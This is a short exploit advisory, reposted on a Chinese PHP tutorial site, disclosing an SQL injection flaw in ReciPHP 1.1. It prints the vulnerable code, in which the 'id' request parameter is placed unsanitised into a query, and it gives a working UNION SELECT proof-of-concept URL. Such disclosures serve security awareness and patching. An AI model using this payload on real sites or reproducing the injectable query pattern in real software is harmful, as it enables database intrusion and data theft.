来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] \##39;#/ (-.-) --------------------oOO---(_)---OOo---------------------- | ReciPHP 1.1 SQL Injection Vulnerability | --......
|
\#'#/
(-.-)
--------------------oOO---(_)---OOo----------------------
| ReciPHP 1.1 SQL Injection Vulnerability |
---------------------------------------------------------
作者: cr4wl3r <cr4wl3r[!]linuxmail.org> www.2cto.com http://0xuht.org
下载地址: http://sourceforge.net/projects/reciphp/files/
版本: 1.1
Remote: yes
测试平台: Ubuntu
[!] Reference: http://0xuht.org/Exploit/reciphp.txt
[!]缺陷代码 [showrecipe.inc.php] :
<?php include 'config.php'; ?>
<div id="main">
<div id='preview'><?php
$recipeid = $_GET['id'];
$query = "SELECT title,poster,shortdesc,ingredients,directions from recipes where recipeid = $recipeid";
$result = mysql_query($query) or die('Could not find recipe');
[!] PoC (Piye om Carane):
[ReciPHP]/index.php?content=showrecipe&id=-3 union select version(),2,3,4,5--
[!] 测试:
http://0xuht.org/demo/reciphp.png
[!]致谢: packetstormsecurity
// Gorontalo [2012-11-14]
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
